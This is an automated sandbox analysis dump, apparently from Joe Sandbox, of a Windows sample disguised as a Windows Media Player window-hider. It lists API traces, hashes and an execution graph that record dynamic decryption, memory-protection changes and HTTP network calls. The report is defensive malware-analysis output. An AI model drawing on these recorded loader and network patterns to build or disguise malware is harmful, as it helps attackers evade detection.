                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 1dc2de6eb9a6409fc4938d72f86069b54b8c05795739e79e6c4f1c0f952e667f
                                                                                      • Instruction ID: e39f13a1e0efa28577c72cdc6c4425971598f3d6cb8688497456042565dff69e
                                                                                      • Opcode Fuzzy Hash: 1dc2de6eb9a6409fc4938d72f86069b54b8c05795739e79e6c4f1c0f952e667f
                                                                                      • Instruction Fuzzy Hash: CAD01230FC42448ED606BAB57825BAF25FA9F90705F40883DF5418F286DF6288229F91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322259807.0000000002151000.00000020.00001000.00020000.00000000.sdmp, Offset: 02151000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_2151000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 603be819e204da0518020e24da3af8baf26c7ac2b8ac7e80a5096bd84e4401d7
                                                                                      • Instruction ID: c9a3b1081c9ad60dacdf063bb1398db097c94491148cbd02684aeddc98cb2a77
                                                                                      • Opcode Fuzzy Hash: 603be819e204da0518020e24da3af8baf26c7ac2b8ac7e80a5096bd84e4401d7
                                                                                      • Instruction Fuzzy Hash: C341B774A40219EFDB05CF44C494BAAB7B2FB88314F24C599EC295B355C775EA82CB80
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,000001C3,00000000,?,38CFF007,?,?), ref: 021B84C7
                                                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 021B853C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateHandleInformation
                                                                                      • String ID:
                                                                                      • API String ID: 3667790775-0
                                                                                      • Opcode ID: 61a27b58d4d84efce9cac1fbcbed8267f1fd200f017ae4c2fd9c54959c828da0
                                                                                      • Instruction ID: 4ec0ce9dd3be8045b2cee496841371f223b73fd594458620f6669ceb461f3bcc
                                                                                      • Opcode Fuzzy Hash: 61a27b58d4d84efce9cac1fbcbed8267f1fd200f017ae4c2fd9c54959c828da0
                                                                                      • Instruction Fuzzy Hash: CCF086706882004BCA2ED96898A4BBE73FE5F88714F55091DF15ADB9D0D72198414792
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322259807.0000000002151000.00000020.00001000.00020000.00000000.sdmp, Offset: 02151000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_2151000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 0a7ec7145f440db6e1cddd4699c1e57eec5c16a172483f947b29b8306aa274e5
                                                                                      • Instruction ID: 09a9b750e148cbdccbbfea69c6ebc9a26267605a3cadaf38892728f45c4acb17
                                                                                      • Opcode Fuzzy Hash: 0a7ec7145f440db6e1cddd4699c1e57eec5c16a172483f947b29b8306aa274e5
                                                                                      • Instruction Fuzzy Hash: 8FD017B4D80208FFD740EFA4D90AA9EBBB4AF04202F9080A4ED1467240E7B02A148B92
                                                                                      APIs
                                                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 0215182F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322259807.0000000002151000.00000020.00001000.00020000.00000000.sdmp, Offset: 02151000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_2151000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: a6a5e6ab66d06225ed6951826b560ecf56a6b02e8fd10b5e024f177a48fc8012
                                                                                      • Instruction ID: ca941a37836181078f6c1c23947eb134308caef50f3275d1487849bf1f54ad64
                                                                                      • Opcode Fuzzy Hash: a6a5e6ab66d06225ed6951826b560ecf56a6b02e8fd10b5e024f177a48fc8012
                                                                                      • Instruction Fuzzy Hash: BAC04C7A55430CEB8B04DF98E884DAB77EDBB8C650B448548BA1D87200D630F9508BA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;r'$ ;r'$ ;r'
                                                                                      • API String ID: 0-3796487830
                                                                                      • Opcode ID: 8fe25a3b043681836c9a6f90290d4aea52d84e7de3629ca6ee361b93272dc601
                                                                                      • Instruction ID: ba32ab3cdc8dbcd9b115355f372b76220ecb71db2e934674fd7455138bd5249f
                                                                                      • Opcode Fuzzy Hash: 8fe25a3b043681836c9a6f90290d4aea52d84e7de3629ca6ee361b93272dc601
                                                                                      • Instruction Fuzzy Hash: 2441A725FC42019BDB1B5ABDB8A07BB32F69F85310B144879EA16C7241EB61DC42CF51
                                                                                      APIs
                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401D96
                                                                                        • Part of subcall function 00401F90: FindWindowA.USER32(WMPlayerApp,00000000), ref: 00401F97
                                                                                      • DestroyWindow.USER32(?), ref: 00401D9D
                                                                                      • GetSystemMenu.USER32(?,00000000), ref: 00401DA8
                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00401DC0
                                                                                      • AppendMenuA.USER32(00000000,00000000,00000005,About...), ref: 00401DCC
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Show Window,50000000,00000005,00000005,0000007D,00000019,?,00000002,00000000,00000000), ref: 00401DF8
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Hide Window,50000000,00000087,00000005,0000007D,00000019,?,00000003,00000000,00000000), ref: 00401E27
                                                                                      • CreateWindowExA.USER32(00000000,Edit,Windows Media Player,50800000,0000000F,0000002D,000000EB,00000019,?,00000001,00000000,00000000), ref: 00401E56
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Change Caption,50000000,00000048,0000004E,0000007D,00000019,?,00000004,00000000,00000000), ref: 00401E81
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFB
                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00401F0D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1321303843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1321284705.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321339220.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$Menu$Append$DestroyFindMessagePostProcQuitShowSystem
                                                                                      • String ID: &Change Caption$&Hide Window$&Show Window$About...$Button$Edit$Windows Media Player
                                                                                      • API String ID: 1675743168-3498740803
                                                                                      • Opcode ID: 6fa5b30cb9d90c5671a906c00b49d1a349abe0e32d26c551bf39c42dfad87899
                                                                                      • Instruction ID: d2c89a25cf38dd3cc98bce7da6c1abaab37f22b51a640bf9a67e858da95faab1
                                                                                      • Opcode Fuzzy Hash: 6fa5b30cb9d90c5671a906c00b49d1a349abe0e32d26c551bf39c42dfad87899
                                                                                      • Instruction Fuzzy Hash: 43416271384705BBF630A7649D4AF6B3698EB44F15F204437F701BA2E1D6F9A8408BAD
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1321303843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1321284705.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321339220.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                      • String ID:
                                                                                      • API String ID: 801014965-0
                                                                                      • Opcode ID: 6ec102433b06512b8c0474839b6dd368cc5f6bc9c2e1b5937cc38a74b614f200
                                                                                      • Instruction ID: 87e11df5f4ae46379268185e5a3862cdd04542f6cf5212e8f2ca647c65b29d7f
                                                                                      • Opcode Fuzzy Hash: 6ec102433b06512b8c0474839b6dd368cc5f6bc9c2e1b5937cc38a74b614f200
                                                                                      • Instruction Fuzzy Hash: EB415DB19016449FDB249FA4DE49AAA7BB8FB09710F20017FE952B72E1C7B84940CF58
                                                                                      APIs
                                                                                      • SetLastError.KERNEL32(0000007F), ref: 021514DB
                                                                                      • SetLastError.KERNEL32(0000007F), ref: 02151507
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322259807.0000000002151000.00000020.00001000.00020000.00000000.sdmp, Offset: 02151000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_2151000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0
                                                                                      • Opcode ID: 38d59d98edf10e95d0040ecf6f75dc42b4bd876feba1705b95f5e4ba4daa6bc0
                                                                                      • Instruction ID: 4229021a8659925bddf22ac13af3bafc9d05b8c8ff336f2b4fbcab3be19afa0b
                                                                                      • Opcode Fuzzy Hash: 38d59d98edf10e95d0040ecf6f75dc42b4bd876feba1705b95f5e4ba4daa6bc0
                                                                                      • Instruction Fuzzy Hash: 6A71D874E50219EFDB08DF94C580BADB7F2FF48304F648598D92AAB341D774AA91CB90
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?), ref: 0040108C
                                                                                      • DestroyWindow.USER32(?), ref: 0040109C
                                                                                      • SetDlgItemTextA.USER32(?,000003E8,This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window.), ref: 004010B6
                                                                                      • DestroyWindow.USER32(?), ref: 004010E0
                                                                                      Strings
                                                                                      • This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window., xrefs: 004010AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1321303843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1321284705.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321339220.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyWindow$ItemText
                                                                                      • String ID: This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window.
                                                                                      • API String ID: 396529852-1331625695
                                                                                      • Opcode ID: a61dc5f83ef90b811d585fcc311af718773135b45cb18a34e47a048bdf587a9a
                                                                                      • Instruction ID: b100099e501738790042682215e8a6d7cad033c4a8bb43f03221d718276c4884
                                                                                      • Opcode Fuzzy Hash: a61dc5f83ef90b811d585fcc311af718773135b45cb18a34e47a048bdf587a9a
                                                                                      • Instruction Fuzzy Hash: 0DF0AF322142406FC7148B70DA8C92B72D4EBA9701F41CC3AF182E6AE4D73DCC90EB59
                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02152468
                                                                                      • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 021524B2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322259807.0000000002151000.00000020.00001000.00020000.00000000.sdmp, Offset: 02151000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_2151000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID: @
                                                                                      • API String ID: 544645111-2766056989
                                                                                      • Opcode ID: 6c2df5c8b49438196d5d3774c7a48a33bbf5bbd1db1b9e2142c462ce5d7016b8
                                                                                      • Instruction ID: 2a6d660bf587a297ee938417ad6ad13f22ad7f4642dd627ed4fe214f99512c53
                                                                                      • Opcode Fuzzy Hash: 6c2df5c8b49438196d5d3774c7a48a33bbf5bbd1db1b9e2142c462ce5d7016b8
                                                                                      • Instruction Fuzzy Hash: 3621E7B1E44219EFDF14CF98C984BAEBBB5BF44304F2085D9ED25AB240C774AA80DB55
                                                                                      APIs
                                                                                      • GetModuleHandleExA.KERNEL32(00000000,kernel32.dll), ref: 004015A3
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,kernel32.dll), ref: 004015BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1321303843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1321284705.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321339220.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHandleModuleVirtual
                                                                                      • String ID: kernel32.dll
                                                                                      • API String ID: 2270936652-1793498882
                                                                                      • Opcode ID: 5bf35002c93f4facc3e081f7e865f0f685930981354593ef6d5b8ce1566f61f9
                                                                                      • Instruction ID: bb32f66759e984ad9a82917001f02bd0d3e76ee526862dde03f538f9ec23572d
                                                                                      • Opcode Fuzzy Hash: 5bf35002c93f4facc3e081f7e865f0f685930981354593ef6d5b8ce1566f61f9
                                                                                      • Instruction Fuzzy Hash: BCF0A77230132427C614DA555C05BAF6699FBC4B61F14043EFA07F72C0CB749904D3A9
                                                                                      APIs
                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 021521F9
                                                                                      • SetLastError.KERNEL32(0000007E), ref: 0215223B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322259807.0000000002151000.00000020.00001000.00020000.00000000.sdmp, Offset: 02151000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_2151000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 4100373531-0
                                                                                      • Opcode ID: bb609784c086c6ce03699c1241c130f70ef7a40ddd124792f15c2918b8726793
                                                                                      • Instruction ID: 275d7edb48337e0b0d25ad81b0e04cd21a47f69184a6ad65f05ef22e5afd084f
                                                                                      • Opcode Fuzzy Hash: bb609784c086c6ce03699c1241c130f70ef7a40ddd124792f15c2918b8726793
                                                                                      • Instruction Fuzzy Hash: FC81A975A40219EFDB48CF94C894BAEB7B1FF48314F148198ED19AB351D734AA91CF90

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.6%
                                                                                      Dynamic/Decrypted Code Coverage:93.1%
                                                                                      Signature Coverage:2.7%
                                                                                      Total number of Nodes:524
                                                                                      Total number of Limit Nodes:49
                                                                                      execution_graph 13021 21e8808 13026 21e8810 13021->13026 13022 21e88b8 13023 21e88eb CreateFileW 13023->13022 13023->13026 13024 21e4190 GetPEB 13024->13026 13025 21e40f0 GetPEB 13025->13026 13026->13022 13026->13023 13026->13024 13026->13025 14440 21e9eb8 14451 21e9ec0 14440->14451 14441 21ea08e 14445 21ea02a 14441->14445 14446 21e4190 GetPEB 14441->14446 14442 21e9f88 FindFirstChangeNotificationW 14444 21ea0d0 4 API calls 14442->14444 14443 21ea0d0 4 API calls 14443->14451 14444->14451 14447 21ea0a1 14446->14447 14448 21e40f0 GetPEB 14447->14448 14448->14445 14449 21e4190 GetPEB 14449->14451 14450 21e40f0 GetPEB 14450->14451 14451->14441 14451->14442 14451->14443 14451->14445 14451->14449 14451->14450 13182 21ea230 13189 21ea240 13182->13189 13183 21ea310 13184 21ea334 CreateThread 13183->13184 13185 21e4190 GetPEB 13183->13185 13186 21ea29e 13184->13186 13193 21e9ea0 13184->13193 13187 21ea323 13185->13187 13188 21e40f0 GetPEB 13187->13188 13191 21ea32f 13188->13191 13189->13183 13189->13186 13190 21e4190 GetPEB 13189->13190 13192 21e40f0 GetPEB 13189->13192 13190->13189 13191->13184 13192->13189 13204 21e9ec0 13193->13204 13194 21ea08e 13199 21ea02a 13194->13199 13200 21e4190 GetPEB 13194->13200 13195 21e9f88 FindFirstChangeNotificationW 13205 21ea0d0 13195->13205 13196 21e4190 GetPEB 13196->13204 13197 21ea0d0 4 API calls 13197->13204 13202 21ea0a1 13200->13202 13201 21e40f0 GetPEB 13201->13204 13203 21e40f0 GetPEB 13202->13203 13203->13199 13204->13194 13204->13195 13204->13196 13204->13197 13204->13199 13204->13201 13212 21ea0e0 13205->13212 13206 21ea1ce 13206->13204 13207 21ea1da 13208 21ea1fe lstrcmpiW 13207->13208 13210 21e4190 GetPEB 13207->13210 13208->13204 13209 21ea197 GetCurrentProcess QueryFullProcessImageNameW 13209->13212 13211 21ea1ed 13210->13211 13214 21e40f0 GetPEB 13211->13214 13212->13206 13212->13207 13212->13209 13213 21e4190 GetPEB 13212->13213 13215 21e40f0 GetPEB 13212->13215 13213->13212 13216 21ea1f9 13214->13216 13215->13212 13216->13208 13217 21e12b0 13219 21e12e1 13217->13219 13218 21e18a8 13359 21e4570 13218->13359 13219->13218 13221 21e35f0 GetPEB 13219->13221 13223 21e18af 13219->13223 13224 21e1800 13219->13224 13226 21e40f0 GetPEB 13219->13226 13231 21e4190 GetPEB 13219->13231 13234 21e3590 GetPEB 13219->13234 13237 21e4570 GetPEB 13219->13237 13238 21e22c0 13219->13238 13245 21e2ca0 13219->13245 13264 21e5f80 13219->13264 13286 21e1cf0 13219->13286 13302 21e1ec0 13219->13302 13309 21e4610 13219->13309 13319 21e1ff0 13219->13319 13326 21e44b0 13219->13326 13332 21e1980 13219->13332 13354 21e51f0 13219->13354 13221->13219 13226->13219 13231->13219 13234->13219 13237->13219 13243 21e22e5 13238->13243 13239 21e265e 13241 21e4570 GetPEB 13239->13241 13242 21e2653 13239->13242 13240 21e4190 GetPEB 13240->13243 13241->13242 13242->13219 13243->13239 13243->13240 13243->13242 13244 21e40f0 GetPEB 13243->13244 13244->13243 13260 21e2cd8 13245->13260 13246 21e3129 13248 21e3148 13246->13248 13250 21e4190 GetPEB 13246->13250 13247 21e311c InternetCloseHandle 13247->13260 13248->13219 13249 21e2d6e 13249->13219 13255 21e313c 13250->13255 13251 21e2e12 InternetConnectW 13251->13260 13252 21e35f0 GetPEB 13252->13260 13254 21e4190 GetPEB 13254->13260 13258 21e40f0 GetPEB 13255->13258 13256 21e30d6 HttpSendRequestW 13256->13260 13257 21e2d38 InternetOpenW 13259 21e4570 GetPEB 13257->13259 13258->13248 13259->13260 13260->13246 13260->13247 13260->13249 13260->13251 13260->13252 13260->13254 13260->13256 13260->13257 13261 21e3013 ObtainUserAgentString 13260->13261 13262 21e40f0 GetPEB 13260->13262 13369 21e2a40 13260->13369 13382 21e5a60 13260->13382 13261->13260 13262->13260 13265 21e5fa6 13264->13265 13266 21e5f90 13264->13266 13270 21e5fd3 RtlAllocateHeap 13265->13270 13272 21e4190 GetPEB 13265->13272 13267 21e4190 GetPEB 13266->13267 13268 21e5f9a 13267->13268 13269 21e40f0 GetPEB 13268->13269 13269->13265 13271 21e6052 13270->13271 13274 21e5fe3 13270->13274 13271->13219 13273 21e5fc2 13272->13273 13275 21e40f0 GetPEB 13273->13275 13276 21e6019 13274->13276 13278 21e4190 GetPEB 13274->13278 13277 21e5fce 13275->13277 13281 21e6046 RtlFreeHeap 13276->13281 13282 21e4190 GetPEB 13276->13282 13277->13270 13279 21e600d 13278->13279 13280 21e40f0 GetPEB 13279->13280 13280->13276 13281->13219 13283 21e6035 13282->13283 13284 21e40f0 GetPEB 13283->13284 13285 21e6041 13284->13285 13285->13281 13287 21e1d5b 13286->13287 13288 21e1d71 13286->13288 13289 21e4190 GetPEB 13287->13289 13292 21e4190 GetPEB 13288->13292 13294 21e1dfe 13288->13294 13290 21e1d65 13289->13290 13291 21e40f0 GetPEB 13290->13291 13291->13288 13293 21e1df2 13292->13293 13295 21e40f0 GetPEB 13293->13295 13296 21e1e32 13294->13296 13297 21e4190 GetPEB 13294->13297 13295->13294 13300 21e51f0 GetPEB 13296->13300 13298 21e1e26 13297->13298 13299 21e40f0 GetPEB 13298->13299 13299->13296 13301 21e1e66 13300->13301 13301->13219 13308 21e1ed6 13302->13308 13303 21e1eff 13303->13219 13304 21e1fd3 13391 21e5320 13304->13391 13306 21e40f0 GetPEB 13306->13308 13307 21e4190 GetPEB 13307->13308 13308->13303 13308->13304 13308->13306 13308->13307 13310 21e461d 13309->13310 13315 21e4633 13309->13315 13311 21e4190 GetPEB 13310->13311 13312 21e4627 13311->13312 13313 21e40f0 GetPEB 13312->13313 13313->13315 13314 21e465b 13314->13219 13315->13314 13316 21e4190 GetPEB 13315->13316 13317 21e464f 13316->13317 13318 21e40f0 GetPEB 13317->13318 13318->13314 13325 21e2008 13319->13325 13320 21e2043 13320->13219 13321 21e22a2 13321->13320 13323 21e4570 GetPEB 13321->13323 13322 21e4190 GetPEB 13322->13325 13323->13320 13324 21e40f0 GetPEB 13324->13325 13325->13320 13325->13321 13325->13322 13325->13324 13327 21e44d0 13326->13327 13328 21e44c2 13326->13328 13327->13219 13329 21e4190 GetPEB 13328->13329 13330 21e44c7 13329->13330 13331 21e40f0 GetPEB 13330->13331 13331->13327 13353 21e199f 13332->13353 13333 21e1c46 13334 21e36f0 GetPEB 13333->13334 13336 21e1c50 13334->13336 13335 21e1c39 13335->13219 13337 21e1c71 13336->13337 13338 21e4190 GetPEB 13336->13338 13342 21e1ca3 13337->13342 13344 21e4190 GetPEB 13337->13344 13340 21e1c65 13338->13340 13339 21e40f0 GetPEB 13339->13353 13343 21e40f0 GetPEB 13340->13343 13341 21e5180 GetPEB 13341->13353 13347 21e1ccb 13342->13347 13348 21e4190 GetPEB 13342->13348 13343->13337 13345 21e1c97 13344->13345 13346 21e40f0 GetPEB 13345->13346 13346->13342 13347->13219 13349 21e1cbf 13348->13349 13350 21e40f0 GetPEB 13349->13350 13350->13347 13352 21e4190 GetPEB 13352->13353 13353->13333 13353->13335 13353->13339 13353->13341 13353->13352 13397 21e36f0 13353->13397 13357 21e5206 13354->13357 13355 21e528d 13355->13219 13356 21e4190 GetPEB 13356->13357 13357->13355 13357->13356 13358 21e40f0 GetPEB 13357->13358 13358->13357 13360 21e457d 13359->13360 13364 21e4593 13359->13364 13361 21e4190 GetPEB 13360->13361 13362 21e4587 13361->13362 13363 21e40f0 GetPEB 13362->13363 13363->13364 13365 21e45bb 13364->13365 13366 21e4190 GetPEB 13364->13366 13365->13223 13367 21e45af 13366->13367 13368 21e40f0 GetPEB 13367->13368 13368->13365 13373 21e2a60 13369->13373 13370 21e2b7a 13372 21e2bc7 13370->13372 13374 21e2b9f 13370->13374 13376 21e4190 GetPEB 13370->13376 13371 21e4190 GetPEB 13371->13373 13372->13260 13373->13370 13373->13371 13375 21e40f0 GetPEB 13373->13375 13374->13372 13379 21e4190 GetPEB 13374->13379 13375->13373 13377 21e2b93 13376->13377 13378 21e40f0 GetPEB 13377->13378 13378->13374 13380 21e2bbb 13379->13380 13381 21e40f0 GetPEB 13380->13381 13381->13372 13389 21e5a71 13382->13389 13383 21e5b69 13384 21e5b62 13383->13384 13385 21e4190 GetPEB 13383->13385 13384->13260 13386 21e5b7c 13385->13386 13387 21e40f0 GetPEB 13386->13387 13387->13384 13388 21e4190 GetPEB 13388->13389 13389->13383 13389->13384 13389->13388 13390 21e40f0 GetPEB 13389->13390 13390->13389 13392 21e5349 13391->13392 13393 21e535f 13391->13393 13394 21e4190 GetPEB 13392->13394 13393->13303 13395 21e5353 13394->13395 13396 21e40f0 GetPEB 13395->13396 13396->13393 13398 21e3714 13397->13398 13399 21e4190 GetPEB 13398->13399 13400 21e3739 13398->13400 13401 21e372d 13399->13401 13403 21e4190 GetPEB 13400->13403 13406 21e3761 13400->13406 13402 21e40f0 GetPEB 13401->13402 13402->13400 13404 21e3755 13403->13404 13405 21e40f0 GetPEB 13404->13405 13405->13406 13406->13353 13407 21e5720 13412 21e5730 13407->13412 13408 21e57fa 13409 21e57de GetNativeSystemInfo 13409->13412 13410 21e4190 GetPEB 13410->13412 13411 21e40f0 GetPEB 13411->13412 13412->13408 13412->13409 13412->13410 13412->13411 12952 401600 LoadLibraryA GetProcAddress EncryptFileA 12953 401630 12952->12953 12954 40163f 22 API calls 12952->12954 12955 401878 VirtualAlloc 12954->12955 12956 40185e LdrAccessResource 12954->12956 12982 40100a 12955->12982 12956->12955 12958 4018b6 12985 401019 12958->12985 12960 4018c6 12961 4018e1 LoadIconA LoadCursorA GetStockObject RegisterClassA 12960->12961 12962 4019d3 CreateWindowExA ShowWindow UpdateWindow GetMessageA 12960->12962 12961->12962 12963 40195e 8 API calls 12961->12963 12964 401a3c 12962->12964 12965 401a6d ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N 12962->12965 12967 401a48 TranslateMessage DispatchMessageA GetMessageA 12964->12967 12966 401a8b 12965->12966 12970 401a96 12965->12970 12968 401a9d ??3@YAXPAX 12966->12968 12966->12970 12967->12965 12967->12967 12968->12970 12969 401ac6 12972 401af6 12969->12972 12974 401afd ??3@YAXPAX 12969->12974 12970->12969 12971 401acd ??3@YAXPAX 12970->12971 12971->12969 12973 401b26 12972->12973 12975 401b2d ??3@YAXPAX 12972->12975 12976 401b56 12973->12976 12977 401b5d ??3@YAXPAX 12973->12977 12974->12972 12975->12973 12978 401b86 12976->12978 12979 401b8d ??3@YAXPAX 12976->12979 12977->12976 12980 401bb9 12978->12980 12981 401bcd ??3@YAXPAX 12978->12981 12979->12978 12981->12980 12982->12958 12983 401210 malloc 12982->12983 12984 40122c 12983->12984 12984->12958 12985->12960 12987 4012e0 12985->12987 12986 4014d1 12986->12960 12987->12986 12988 40136e 22 API calls 12987->12988 12988->12987 12989 4014b8 12988->12989 12989->12960 13027 21e73c9 13033 21e73d0 13027->13033 13028 21e7555 13030 21e7320 GetPEB LoadLibraryW 13030->13033 13031 21e7479 LoadLibraryW 13031->13033 13032 21e4190 GetPEB 13032->13033 13033->13028 13033->13030 13033->13031 